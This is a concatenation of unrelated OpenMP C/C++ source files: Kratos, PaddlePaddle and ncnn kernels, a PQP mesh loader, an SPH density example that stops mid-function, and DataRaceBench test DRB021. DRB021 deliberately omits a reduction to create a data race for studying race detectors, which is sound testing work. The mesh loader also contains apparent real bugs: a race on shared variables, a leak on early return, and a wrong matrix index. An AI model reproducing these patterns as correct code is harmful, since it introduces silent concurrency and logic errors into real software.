TSparseSpace::WriteMatrixMarketVector((char*) (matrix_market_vectname.str()).c_str(), rb);
}
}
///@}
///@name Private Operations*/
///@{
///@}
///@name Private Access */
///@{
///@}
///@name Private Inquiry */
///@{
///@}
///@name Un accessible methods */
///@{
/** Copy constructor.
*/
ResidualBasedLinearStrategy(const ResidualBasedLinearStrategy& Other);
///@}
}; /* Class ResidualBasedLinearStrategy */
///@}
///@name Type Definitions */
///@{
///@}
} /* namespace Kratos.*/
#endif /* KRATOS_RESIDUALBASED_LINEAR_STRATEGY defined */
|
DRB021-reductionmissing-orig-yes.c | /*
Copyright (c) 2017, Lawrence Livermore National Security, LLC.
Produced at the Lawrence Livermore National Laboratory
Written by Chunhua Liao, Pei-Hung Lin, Joshua Asplund,
Markus Schordan, and Ian Karlin
(email: liao6@llnl.gov, lin32@llnl.gov, asplund1@llnl.gov,
schordan1@llnl.gov, karlin1@llnl.gov)
LLNL-CODE-732144
All rights reserved.
This file is part of DataRaceBench. For details, see
https://github.com/LLNL/dataracebench. Please also see the LICENSE file
for our additional BSD notice.
Redistribution and use in source and binary forms, with
or without modification, are permitted provided that the following
conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the disclaimer below.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the disclaimer (as noted below)
in the documentation and/or other materials provided with the
distribution.
* Neither the name of the LLNS/LLNL nor the names of its contributors
may be used to endorse or promote products derived from this
software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL LAWRENCE LIVERMORE NATIONAL
SECURITY, LLC, THE U.S. DEPARTMENT OF ENERGY OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
A kernel with two level parallelizable loop with reduction:
if reduction(+:sum) is missing, there is race condition.
Data race pairs: we allow multiple pairs to preserve the pattern.
sum@70:7 vs. sum@70:7
sum@70:7 vs. sum@70:13
*/
#include <stdio.h>
int main(int argc, char* argv[])
{
int i,j;
float temp, sum=0.0;
int len=100;
float u[100][100];
for (i = 0; i < len; i++)
for (j = 0; j < len; j++)
u[i][j] = 0.5;
#pragma omp parallel for private (temp,i,j) schedule(dynamic)
for (i = 0; i < len; i++)
for (j = 0; j < len; j++)
{
temp = u[i][j];
sum = sum + temp * temp;
}
printf ("sum = %f\n", sum);
return 0;
}
|
mode_op.h | /* Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License. */
#pragma once
#include <algorithm>
#include <iostream>
#include <utility>
#include <vector>
#include "paddle/fluid/framework/eigen.h"
#include "paddle/fluid/framework/op_registry.h"
#include "paddle/fluid/operators/transpose_op.h"
namespace paddle {
namespace operators {
template <typename T, typename Type>
static void getMode(Type input_height, Type input_width, int input_dim,
const framework::Tensor* input, T* t_out, Type* t_indices) {
#ifdef PADDLE_WITH_MKLML
#pragma omp parallel for
#endif
for (Type i = 0; i < input_height; ++i) {
std::vector<std::pair<T, Type>> col_vec;
col_vec.reserve(input_width);
if (input_dim == 1) {
auto e_input = framework::EigenVector<T>::Flatten(*input);
for (Type j = 0; j < input_width; ++j) {
col_vec.emplace_back(std::pair<T, Type>(e_input(j), j));
}
} else {
auto e_input = framework::EigenMatrix<T>::Reshape(*input, input_dim - 1);
for (Type j = 0; j < input_width; ++j) {
col_vec.emplace_back(std::pair<T, Type>(e_input(i, j), j));
}
}
std::sort(col_vec.begin(), col_vec.end(),
[](const std::pair<T, Type>& l, const std::pair<T, Type>& r) {
return (!std::isnan(static_cast<double>(l.first)) &&
std::isnan(static_cast<double>(r.first))) ||
(l.first < r.first);
});
T mode = 0;
int64_t indice = 0;
int64_t cur_freq = 0;
int64_t max_freq = 0;
for (int64_t i = 0; i < input_width; ++i) {
++cur_freq;
if (i == input_width - 1 || (col_vec[i + 1].first != col_vec[i].first)) {
if (cur_freq > max_freq) {
max_freq = cur_freq;
mode = col_vec[i].first;
indice = col_vec[i].second;
}
cur_freq = 0;
}
}
t_out[i] = mode;
t_indices[i] = indice;
}
}
template <typename T, typename Type>
static void ModeAssign(const Type& input_height, const Type& input_width,
const int& input_dim, const framework::Tensor* input,
const framework::Tensor* indices, T* output_data) {
#ifdef PADDLE_WITH_MKLML
#pragma omp parallel for
#endif
for (Type i = 0; i < input_height; ++i) {
if (input_dim == 1) {
auto e_input = framework::EigenVector<T>::Flatten(*input);
auto e_indices = framework::EigenVector<Type>::Flatten(*indices);
output_data[i * input_width + e_indices(0)] = e_input(0);
} else {
auto e_input = framework::EigenMatrix<T>::Reshape(*input, input_dim - 1);
auto e_indices =
framework::EigenMatrix<Type>::Reshape(*indices, input_dim - 1);
output_data[i * input_width + e_indices(i, 0)] = e_input(i, 0);
}
}
}
template <typename DeviceContext, typename T>
class ModeCPUKernel : public framework::OpKernel<T> {
public:
void Compute(const framework::ExecutionContext& context) const override {
auto* input = context.Input<framework::Tensor>("X");
auto* output = context.Output<framework::Tensor>("Out");
auto* indices = context.Output<framework::Tensor>("Indices");
const auto& in_dims = input->dims();
bool keepdim = static_cast<bool>(context.Attr<bool>("keepdim"));
// axis < 0, cacluate the real axis
int axis = static_cast<int>(context.Attr<int>("axis"));
if (axis < 0) axis += in_dims.size();
T* output_data = output->mutable_data<T>(context.GetPlace());
int64_t* indices_data = indices->mutable_data<int64_t>(context.GetPlace());
auto out_dims = output->dims();
// if axis is not the last dim, transpose it to the last dim, do the
// calculation,
// then tranpose it back to orginal axis.
if (axis == in_dims.size() - 1) {
const int64_t& input_height = framework::product(
framework::slice_ddim(in_dims, 0, in_dims.size() - 1));
const int64_t& input_width = in_dims[in_dims.size() - 1];
getMode<T, int64_t>(input_height, input_width, in_dims.size(), input,
output_data, indices_data);
} else {
std::vector<int> trans_axis;
for (int i = 0; i < axis; i++) {
trans_axis.emplace_back(i);
}
trans_axis.push_back(in_dims.size() - 1);
for (int i = axis + 1; i < in_dims.size() - 1; i++) {
trans_axis.emplace_back(i);
}
trans_axis.emplace_back(axis);
if (!keepdim) {
std::vector<int> tmp_out_shape;
for (int i = 0; i < axis; i++) {
tmp_out_shape.emplace_back(in_dims[i]);
}
tmp_out_shape.emplace_back(1);
for (int i = axis + 1; i < in_dims.size(); i++) {
tmp_out_shape.emplace_back(in_dims[i]);
}
framework::DDim tmp_out_dim = framework::make_ddim(tmp_out_shape);
output->Resize(tmp_out_dim);
indices->Resize(tmp_out_dim);
}
// get the trans input_dims, out_dims
framework::DDim trans_shape(in_dims);
framework::DDim trans_out_shape(in_dims);
for (size_t i = 0; i < trans_axis.size(); i++) {
trans_shape[i] = in_dims[trans_axis[i]];
trans_out_shape[i] = in_dims[trans_axis[i]];
}
trans_out_shape[in_dims.size() - 1] = 1;
framework::Tensor trans_input;
trans_input.mutable_data<T>(trans_shape, context.GetPlace());
int ndims = trans_axis.size();
auto& dev_context =
context.template device_context<platform::CPUDeviceContext>();
// transpose the input value
TransCompute<platform::CPUDeviceContext, T>(ndims, dev_context, *input,
&trans_input, trans_axis);
const int64_t input_height = framework::product(
framework::slice_ddim(trans_shape, 0, trans_shape.size() - 1));
const int64_t input_width = trans_shape[trans_shape.size() - 1];
framework::Tensor tmp_out;
T* t_out = tmp_out.mutable_data<T>(trans_out_shape, context.GetPlace());
framework::Tensor tmp_indices;
auto* t_ind = tmp_indices.mutable_data<int64_t>(trans_out_shape,
context.GetPlace());
getMode<T, int64_t>(input_height, input_width, in_dims.size(),
&trans_input, t_out, t_ind);
// transpose back
TransCompute<platform::CPUDeviceContext, int64_t>(
ndims, dev_context, tmp_indices, indices, trans_axis);
TransCompute<platform::CPUDeviceContext, T>(ndims, dev_context, tmp_out,
output, trans_axis);
if (!keepdim) {
output->Resize(out_dims);
indices->Resize(out_dims);
}
}
}
};
template <typename DeviceContext, typename T>
class ModeGradCPUKernel : public framework::OpKernel<T> {
public:
void Compute(const framework::ExecutionContext& context) const override {
auto* x = context.Input<framework::Tensor>("X");
auto* out_grad =
context.Input<framework::Tensor>(framework::GradVarName("Out"));
auto* indices = context.Input<framework::Tensor>("Indices");
auto* x_grad =
context.Output<framework::Tensor>(framework::GradVarName("X"));
int axis = static_cast<int>(context.Attr<int>("axis"));
bool keepdim = static_cast<bool>(context.Attr<bool>("keepdim"));
auto in_dims = x->dims();
auto out_dims = indices->dims();
// axis < 0, get the real axis
axis = (axis < 0) ? (in_dims.size() + axis) : axis;
if (!keepdim) {
std::vector<int> tmp_out_shape;
for (int i = 0; i < axis; i++) {
tmp_out_shape.emplace_back(out_dims[i]);
}
tmp_out_shape.emplace_back(1);
for (int i = axis + 1; i < in_dims.size(); i++) {
tmp_out_shape.emplace_back(out_dims[i - 1]);
}
out_dims = framework::make_ddim(tmp_out_shape);
}
T* x_grad_data = x_grad->mutable_data<T>(context.GetPlace());
if (axis == in_dims.size() - 1) {
// allocate the memory for the input_grad
// assign the out_grad to input_grad directly
const int64_t input_height = framework::product(
framework::slice_ddim(in_dims, 0, in_dims.size() - 1));
const int64_t input_width = in_dims[in_dims.size() - 1];
// init the output grad with 0, because some input elements has no grad
memset(x_grad_data, 0, x_grad->numel() * sizeof(T));
// Assign the output_grad to input_grad
if (keepdim) {
ModeAssign(input_height, input_width, in_dims.size(), out_grad, indices,
x_grad_data);
} else {
auto& dev_context =
context.template device_context<platform::CPUDeviceContext>();
framework::Tensor out_grad_tmp;
framework::Tensor indices_tmp;
out_grad_tmp.mutable_data<T>(out_grad->dims(), dev_context.GetPlace());
indices_tmp.mutable_data<int64_t>(indices->dims(),
dev_context.GetPlace());
framework::TensorCopy(*out_grad, dev_context.GetPlace(), dev_context,
&out_grad_tmp);
framework::TensorCopy(*indices, dev_context.GetPlace(), dev_context,
&indices_tmp);
out_grad_tmp.Resize(out_dims);
indices_tmp.Resize(out_dims);
ModeAssign(input_height, input_width, in_dims.size(), &out_grad_tmp,
&indices_tmp, x_grad_data);
}
} else {
// can not assign grad to input_grad, must do the transpose
std::vector<int> trans_axis;
for (int i = 0; i < axis; i++) {
trans_axis.emplace_back(i);
}
trans_axis.emplace_back(out_dims.size() - 1);
for (int i = axis + 1; i < out_dims.size() - 1; i++) {
trans_axis.emplace_back(i);
}
trans_axis.emplace_back(axis);
framework::DDim trans_shape(out_dims);
framework::DDim trans_in_shape(in_dims);
for (size_t i = 0; i < trans_axis.size(); i++) {
trans_shape[i] = out_dims[trans_axis[i]];
trans_in_shape[i] = in_dims[trans_axis[i]];
}
// transpose the out_grad, indices
framework::Tensor trans_dO;
trans_dO.mutable_data<T>(trans_shape, context.GetPlace());
framework::Tensor trans_ind;
trans_ind.mutable_data<int64_t>(trans_shape, context.GetPlace());
int ndims = trans_axis.size();
auto& dev_context =
context.template device_context<platform::CPUDeviceContext>();
if (keepdim) {
// Do transpose
TransCompute<platform::CPUDeviceContext, T>(
ndims, dev_context, *out_grad, &trans_dO, trans_axis);
TransCompute<platform::CPUDeviceContext, int64_t>(
ndims, dev_context, *indices, &trans_ind, trans_axis);
} else {
framework::Tensor out_grad_tmp;
framework::Tensor indices_tmp;
out_grad_tmp.mutable_data<T>(out_grad->dims(), dev_context.GetPlace());
indices_tmp.mutable_data<int64_t>(indices->dims(),
dev_context.GetPlace());
framework::TensorCopy(*out_grad, dev_context.GetPlace(), dev_context,
&out_grad_tmp);
framework::TensorCopy(*indices, dev_context.GetPlace(), dev_context,
&indices_tmp);
out_grad_tmp.Resize(out_dims);
indices_tmp.Resize(out_dims);
// Do transpose
TransCompute<platform::CPUDeviceContext, T>(
ndims, dev_context, out_grad_tmp, &trans_dO, trans_axis);
TransCompute<platform::CPUDeviceContext, int64_t>(
ndims, dev_context, indices_tmp, &trans_ind, trans_axis);
}
const int64_t input_height = framework::product(
framework::slice_ddim(trans_in_shape, 0, trans_in_shape.size() - 1));
const int64_t input_width = trans_in_shape[trans_in_shape.size() - 1];
// Assign the out_grad to tranpose input_grad
framework::Tensor tmp_out;
T* t_out = tmp_out.mutable_data<T>(trans_in_shape, context.GetPlace());
memset(t_out, 0, x_grad->numel() * sizeof(T));
ModeAssign<T, int64_t>(input_height, input_width, in_dims.size(),
&trans_dO, &trans_ind, t_out);
// Transpose back
TransCompute<platform::CPUDeviceContext, T>(ndims, dev_context, tmp_out,
x_grad, trans_axis);
}
}
};
} // namespace operators
} // namespace paddle
|
pqpmesh.h | #ifndef GCOP_PQPMESH_H
#define GCOP_PQPMESH_H
#include "PQP.h"
#include <assert.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <iostream>
#include <fstream>
#include <vector>
#include <tf/LinearMath/Transform.h>
/**
* Load a STL Mesh into PQP Model
* Currently Uses tf but can be replaced by Eigen vectors
*/
class PqpMesh{
public:
/** Constructor with STL file name. Creates an internal PQP Model
* @param filename File name for loading stl model
* @param scale Scale for scaling vertices of the mesh
*/
PqpMesh(const char *filename, const double *scale_ = 0);
/** Default constructor with model being two triangles forming the head of an arrow
* @param cr collision radius
*/
PqpMesh(double cr);
/** Default Constructor does not do anything
*/
PqpMesh()
{
}
/** Get current state of mesh as a transform (origin and rotation)
*/
tf::Transform GetState();
virtual ~PqpMesh();
PQP_Model *pm; ///< Model
PQP_REAL pt[3]; ///< Origin
PQP_REAL pR[3][3]; ///< Rotation Matrix
double scale[3]; ///< Scale of STL file
};
PqpMesh::PqpMesh(double cr)
{
pm = new PQP_Model;
PQP_REAL p1[3], p2[3], p3[3], p4[3];
pm->BeginModel();
p1[0] = 0; p1[1] = cr; p1[2] = 0;
p2[0] = 0; p2[1] = -cr; p2[2] = 0;
p3[0] = cr; p3[1] = 0; p3[2] = 0;
pm->AddTri(p1, p2, p3, 0);
p1[0] = 0; p1[1] = 0; p1[2] = cr;
p2[0] = 0; p2[1] = 0; p2[2] = -cr;
p3[0] = cr; p3[1] = 0; p3[2] = 0;
pm->AddTri(p1, p2, p3, 1);
//#TODO Do we need more triangles which are opposite to these triangles in coordinatespace??
pm->EndModel();
pm->MemUsage(1);
//Set Initial mesh origin (0,0,0) and Rotation as Identity
pt[0] = pt[1] = pt[2] = 0;
pR[0][0] = pR[1][1] = pR[2][2] = 1.0;
pR[0][1] = pR[1][0] = pR[2][0] = 0.0;
pR[0][2] = pR[1][2] = pR[2][1] = 0.0;
scale[0] = scale[1] = scale[2] = 0;
}
PqpMesh::PqpMesh(const char *filename, const double *scale_)
{
pm = new PQP_Model;
if(scale_ != 0)
{
memcpy(scale,scale_,3*sizeof(double));
}
else
{
scale[0] = scale[1] = scale[2] = 1.0;//Set scale 1
}
pm->BeginModel();
//Loading File:
FILE* file = fopen(filename,"rb");
if(file)
{
int size=0;
if (fseek(file, 0, SEEK_END) || (size = ftell(file)) == EOF || fseek(file, 0, SEEK_SET))
{
printf("Error: Cannot access file to determine size of %s\n", filename);
}
else
{
if (size)
{
printf("Open STL file of %d bytes\n",size);
char* memoryBuffer = new char[size+1];
int actualBytesRead = fread(memoryBuffer,1,size,file);
if (actualBytesRead!=size)
{
printf("Error reading from file %s",filename);
}
else
{
int numTriangles = *(int*)&memoryBuffer[80];
if (numTriangles)
{
{
//perform a sanity check instead of crashing on invalid triangles/STL files
int expectedBinaryFileSize = numTriangles* 50 + 84;
if (expectedBinaryFileSize != size)
{
return;
}
}
//Looping through the triangles and setting the triangles in PQP
{
int i;
float *vert_temp = (float *)malloc(3*3*numTriangles*sizeof(float));
PQP_REAL p1[3], p2[3], p3[3];//Points of Triangle in PQP Mesh
//tf::Vector3 edge1, edge2, edge3, unit_normal;
#pragma omp parallel for private(i)
for (i=0;i<numTriangles;i++)
{
memcpy(&vert_temp[9*i],&memoryBuffer[96+i*50],36);//9 floats of 4 bytes each (3 loats per vertex)
//Cast Vertices into PQP Reals
p1[0] = scale[0]*vert_temp[9*i]; p1[1] = scale[1]*vert_temp[9*i+1]; p1[2] = scale[2]*vert_temp[9*i+2];
p2[0] = scale[0]*vert_temp[9*i+3]; p2[1] = scale[1]*vert_temp[9*i+4]; p2[2] = scale[2]*vert_temp[9*i+5];
p3[0] = scale[0]*vert_temp[9*i+6]; p3[1] = scale[1]*vert_temp[9*i+7]; p3[2] = scale[2]*vert_temp[9*i+8];
//Add Triangle to PQP
pm->AddTri(p1, p2, p3, i);
/*
// Add Normal to Model:
edge1.setX(p2[0] - p1[0]); edge1.setY(p2[1] - p1[1]); edge1.setZ(p2[2] - p1[2]);
edge2.setX(p3[0] - p2[0]); edge2.setY(p3[1] - p2[1]); edge2.setZ(p3[2] - p2[2]);
//edge3.setX(p1[0] - p3[0]); edge3.setY(p1[1] - p3[1]); edge3.setZ(p1[2] - p3[2]);
unit_normal = (edge1.cross(edge2)).normalized();
normals.push_back(unit_normal);
*/
//#DEBUG
/*printf("Normal: %f,%f,%f\n",unit_normal.x(),unit_normal.y(),unit_normal.z());
printf("Vertices1: %f,%f,%f\n",p1[0],p1[1],p1[2]);
printf("Vertices2: %f,%f,%f\n",p2[0],p2[1],p2[2]);
printf("Vertices3: %f,%f,%f\n",p3[0],p3[1],p3[2]);
*/
}
}
}
delete[] memoryBuffer;
}
}
fclose(file);
}
}
pm->EndModel();
pm->MemUsage(1);
pt[0] = pt[1] = pt[2] = 0;
pR[0][0] = pR[1][1] = pR[2][2] = 1.0;
pR[0][1] = pR[1][0] = pR[2][0] = 0.0;
pR[0][2] = pR[1][2] = pR[2][1] = 0.0;
}
tf::Transform PqpMesh::GetState()
{
tf::Transform t;
t.setOrigin(tf::Vector3(pt[0],pt[1],pt[2]));
tf::Matrix3x3 rotation;
rotation[0][0] = pR[0][0]; rotation[0][1] = pR[0][1]; rotation[0][2] = pR[0][2];
rotation[1][0] = pR[1][0]; rotation[1][1] = pR[1][1]; rotation[1][2] = pR[0][2];
rotation[2][0] = pR[2][0]; rotation[2][1] = pR[2][1]; rotation[2][2] = pR[2][2];
t.setBasis(rotation);
return t;
}
PqpMesh::~PqpMesh()
{
delete pm;
}
#endif
|
convolution_1x1_int8.h | // SenseNets is pleased to support the open source community by supporting ncnn available.
//
// Copyright (C) 2018 SenseNets Technology Ltd. All rights reserved.
//
// Licensed under the BSD 3-Clause License (the "License"); you may not use this file except
// in compliance with the License. You may obtain a copy of the License at
//
// https://opensource.org/licenses/BSD-3-Clause
//
// Unless required by applicable law or agreed to in writing, software distributed
// under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
// CONDITIONS OF ANY KIND, either express or implied. See the License for the
// specific language governing permissions and limitations under the License.
static void conv1x1s1_int8_sse(const Mat &bottom_blob, Mat &top_blob, const Mat &_kernel, const Option& opt)
{
int inch = bottom_blob.c;
int outw = top_blob.w;
int outh = top_blob.h;
int outch = top_blob.c;
const float *kernel = _kernel;
#pragma omp parallel for num_threads(opt.num_threads)
for (int p = 0; p < outch; p++)
{
Mat out0 = top_blob.channel(p);
out0.fill(0);
int q = 0;
for (; q+7<inch; q+=8)
{
int* outptr0 = out0;
const signed char *kernel0 = (const signed char *)kernel + p * inch + q;
const signed char *r0 = bottom_blob.channel(q);
const signed char *r1 = bottom_blob.channel(q + 1);
const signed char *r2 = bottom_blob.channel(q + 2);
const signed char *r3 = bottom_blob.channel(q + 3);
const signed char *r4 = bottom_blob.channel(q + 4);
const signed char *r5 = bottom_blob.channel(q + 5);
const signed char *r6 = bottom_blob.channel(q + 6);
const signed char *r7 = bottom_blob.channel(q + 7);
int size = outw * outh;
int remain = size;
for (; remain > 0; remain--)
{
//ToDo Neon
int sum0 = (int)*r0 * (int)kernel0[0] + (int)*r1 * (int)kernel0[1] +
(int)*r2 * (int)kernel0[2] + (int)*r3 * (int)kernel0[3] +
(int)*r4 * (int)kernel0[4] + (int)*r5 * (int)kernel0[5] +
(int)*r6 * (int)kernel0[6] + (int)*r7 * (int)kernel0[7];
*outptr0 += sum0;
r0++;
r1++;
r2++;
r3++;
r4++;
r5++;
r6++;
r7++;
outptr0++;
}
}
for (; q<inch; q++)
{
int* outptr0 = out0;
const signed char *r0 = bottom_blob.channel(q);
const signed char *kernel0 = (const signed char *)kernel + p * inch + q;
const signed char k0 = kernel0[0];
int size = outw * outh;
int remain = size;
for (; remain > 0; remain--)
{
int sum0 = (int)(*r0) * (int)k0;
*outptr0 += sum0;
r0++;
outptr0++;
}
}
}
}
static void conv1x1s2_int8_sse(const Mat &bottom_blob, Mat &top_blob, const Mat &_kernel, const Option& opt)
{
int w = bottom_blob.w;
int inch = bottom_blob.c;
int outw = top_blob.w;
int outh = top_blob.h;
int outch = top_blob.c;
const int tailstep = w - 2*outw + w;
const signed char *kernel = _kernel;
#pragma omp parallel for num_threads(opt.num_threads)
for (int p = 0; p < outch; p++)
{
Mat out0 = top_blob.channel(p);
out0.fill(0);
int q = 0;
for (; q+7<inch; q+=8)
{
int* outptr0 = out0;
const signed char *kernel0 = (const signed char *)kernel + p * inch + q;
const signed char *r0 = bottom_blob.channel(q);
const signed char *r1 = bottom_blob.channel(q + 1);
const signed char *r2 = bottom_blob.channel(q + 2);
const signed char *r3 = bottom_blob.channel(q + 3);
const signed char *r4 = bottom_blob.channel(q + 4);
const signed char *r5 = bottom_blob.channel(q + 5);
const signed char *r6 = bottom_blob.channel(q + 6);
const signed char *r7 = bottom_blob.channel(q + 7);
for(int i = 0; i < outh; i++)
{
int remain = outw;
for (; remain > 0; remain--)
{
//ToDo Neon
int sum0 = (int)*r0 * (int)kernel0[0] + (int)*r1 * (int)kernel0[1] +
(int)*r2 * (int)kernel0[2] + (int)*r3 * (int)kernel0[3] +
(int)*r4 * (int)kernel0[4] + (int)*r5 * (int)kernel0[5] +
(int)*r6 * (int)kernel0[6] + (int)*r7 * (int)kernel0[7];
*outptr0 += sum0;
r0 += 2;
r1 += 2;
r2 += 2;
r3 += 2;
r4 += 2;
r5 += 2;
r6 += 2;
r7 += 2;
outptr0++;
}
r0 += tailstep;
r1 += tailstep;
r2 += tailstep;
r3 += tailstep;
r4 += tailstep;
r5 += tailstep;
r6 += tailstep;
r7 += tailstep;
}
}
for (; q<inch; q++)
{
int* outptr0 = out0;
const signed char *r0 = bottom_blob.channel(q);
const signed char *kernel0 = (const signed char *)kernel + p * inch + q;
for(int i = 0; i < outh; i++)
{
int remain = outw;
for (; remain > 0; remain--)
{
//ToDo Neon
int sum0 = (int)*r0 * (int)kernel0[0];
*outptr0 += sum0;
r0 += 2;
outptr0++;
}
r0 += tailstep;
}
}
}
}
|
example_07-StructOfArrays-CellLinkedList-InnerOmp-SIMD.c | /*
* SPDX-License-Identifier: BSD-3-Clause
*
* example_07-StructOfArrays-CellLinkedList-InnerOmp-SIMD.c :
* Example of SPH Density Calculation using
* fast neighbor search the main density loop via
* Cell Linked List method, Struct of Arrays (SoA)
* data layout, OpenMP parallelization at the
* chunk level, SIMD directives in the kernel
* and in the main loop.
*
* (C) Copyright 2021 José Hugo Elsas
* Author: José Hugo Elsas <jhelsas@gmail.com>
*
* Command Line Options:
* -runs <int> : Set the number of repetitions (runs) for
* calculating the density. The value of
* the density is based on the last
* iteration.
* Default value: 1
* -run_seed <int>: Flag to set an alternative seed use for
* for the PRNG. Instead of feeding seed
* to the PRNG directly, it feeds
* seed + iteration, as to generate different
* configurations for each iteration.
* Default value: 0 - (possible 0/1)
* -seed <int>: Set the seed to use for the SPH particles
* uniform position generation in the box
* Default value: 123123123
*
* -N <int>: Set the number of SPH particles to be used
* Default value: 1e5 = 100,000
* -h <float>: Set the value of the smoothing kernel
* parameter h, which corresponds to half
* of the support of the kernel.
* Default value: 0.05
*
* -Nx <int>: Set the number of Cells in the X direction
* Default value: 10
* -Ny <int>: Set the number of Cells in the Y direction
* Default value: 10
* -Nz <int>: Set the number of Cells in the Z direction
* Default value: 10
*
* -Xmin <float>: Set the lower bound in the X direction for
* the Cell Linked List box
* Default value: 0.0
* -Ymin <float>: Set the lower bound in the Y direction for
* the Cell Linked List box
* Default value: 0.0
* -Ymin <float>: Set the lower bound in the Z direction for
* the Cell Linked List box
* Default value: 0.0
*
* -Xmax <float>: Set the lower bound in the X direction for
* the Cell Linked List box
* Default value: 1.0
* -Ymax <float>: Set the lower bound in the Y direction for
* the Cell Linked List box
* Default value: 1.0
* -Zmax <float>: Set the lower bound in the Z direction for
* the Cell Linked List box
* Default value: 1.0
*/
#include <math.h>
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <limits.h>
#include <unistd.h>
#include <stdbool.h>
#include <sys/time.h>
#include <inttypes.h>
#include <omp.h>
#include <gsl/gsl_math.h>
#include <gsl/gsl_rng.h>
#include <gsl/gsl_randist.h>
#include <gsl/gsl_heapsort.h>
#include "sph_data_types.h"
#include "sph_linked_list.h"
#include "sph_utils.h"
#ifndef M_PI
#define M_PI (3.14159265358979323846)
#endif
#define COMPUTE_BLOCKS 5
int main_loop(int run, bool run_seed, int64_t N, double h, long int seed,
void *swap_arr, linkedListBox *box, SPHparticle *lsph, double *times);
int compute_density_3d_innerOmp(int N, double h, SPHparticle *lsph, linkedListBox *box);
int compute_density_3d_chunk(int64_t node_begin, int64_t node_end,
int64_t nb_begin, int64_t nb_end,double h,
double* restrict x, double* restrict y,
double* restrict z, double* restrict nu,
double* restrict rho);
double w_bspline_3d_constant(double h);
#pragma omp declare simd
double w_bspline_3d_simd(double q);
int main(int argc, char **argv){
bool run_seed = false; // By default the behavior is is to use the same seed
int runs = 1,err; // it only runs once
long int seed = 123123123; // The default seed is 123123123
int64_t N = 100000; // The default number of particles is N = 1e5 = 100,000
double h=0.05; // The default kernel smoothing length is h = 0.05
linkedListBox *box; // Uninitialized Box containing the cells for the cell linked list method
SPHparticle *lsph; // Uninitialized array of SPH particles
box = (linkedListBox*)malloc(1*sizeof(linkedListBox)); // Create a box representing the entire 3d domain
// allow for command line customization of the run
arg_parse(argc,argv,&N,&h,&seed,&runs,&run_seed,box); // Parse the command line options
// line arguments and override default values
err = SPHparticle_SoA_malloc(N,&lsph);
if(err)
fprintf(stderr,"error in SPHparticle_SoA_malloc\n");
void *swap_arr = malloc(N*sizeof(double));
double times[runs*COMPUTE_BLOCKS];
for(int run=0;run<runs;run+=1)
main_loop(run,run_seed,N,h,seed,swap_arr,box,lsph,times);
bool is_cll = true;
const char *prefix = "ex07,cll,SoA,inner,simd";
print_time_stats(prefix,is_cll,N,h,seed,runs,lsph,box,times);
print_sph_particles_density(prefix,is_cll,N,h,seed,runs,lsph,box);
SPHparticleSOA_safe_free(N,&lsph);
safe_free_box(box);
free(swap_arr);
return 0;
}
/*
* Function main_loop:
* Runs the main loop of the program, including the particle array generation,
* density calculation and the timings annotations.
*
* Arguments:
* run <int> : index (or value) or the present iteration
* run_seed <bool> : boolean defining whether to use run index for seed or not
* N <int> : Number of SPH particles to be used in the run
* h <double> : Smoothing Length for the Smoothing Kernel w_bspline
* seed <long int> : seed for GSL PRNG generator to generate particle positions
* box <linkedListBox> : Box of linked list cells, encapsulating the 3d domain
* lsph <SPHparticle> : Array (pointer) of SPH particles to be updated
* times <double> : Array to store the computation timings to be updated
* Returns:
* 0 : error code returned
* lsph <SPHparticle> : SPH particle array is updated in the rho field by reference
* times <double> : Times is updated by reference
*/
int main_loop(int run, bool run_seed, int64_t N, double h, long int seed,
void *swap_arr, linkedListBox *box, SPHparticle *lsph, double *times)
{
int err;
if(run_seed)
err = gen_unif_rdn_pos_box(N,seed+run,box,lsph);
else
err = gen_unif_rdn_pos_box(N,seed,box,lsph);
if(err)
fprintf(stderr,"error in gen_unif_rdn_pos\n");
// ------------------------------------------------------ //
double t0,t1,t2,t3,t4,t5;
t0 = omp_get_wtime();
err = compute_hash_MC3D(N,lsph,box); // Compute Morton Z 3D hash based on the
if(err) // cell index for each of the X, Y and Z
fprintf(stderr,"error in compute_hash_MC3D\n"); // directions, in which a given particle reside
t1 = omp_get_wtime();
qsort(lsph->hash,N,2*sizeof(int64_t),compare_int64_t); // Sort the Particle Hash Hashes, getting the shuffled
// index necessary to re-shuffle the remaining arrays
t2 = omp_get_wtime();
err = reorder_lsph_SoA(N,lsph,swap_arr); // Reorder all arrays according to the sorted hash,
if(err) // As to have a quick way to retrieve a cell
fprintf(stderr,"error in reorder_lsph_SoA\n"); // given its hash.
t3 = omp_get_wtime();
err = setup_interval_hashtables(N,lsph,box); // Annotate the begining and end of each cell
if(err) // on the cell linked list method for fast
fprintf(stderr,"error in setup_interval_hashtables\n"); // neighbor search
t4 = omp_get_wtime();
err = compute_density_3d_innerOmp(N,h,lsph,box); // Compute the density of the particles based
if(err) // on the cell linked list method for fast
fprintf(stderr,"error in compute_density\n"); // neighbor search
// ------------------------------------------------------ //
t5 = omp_get_wtime();
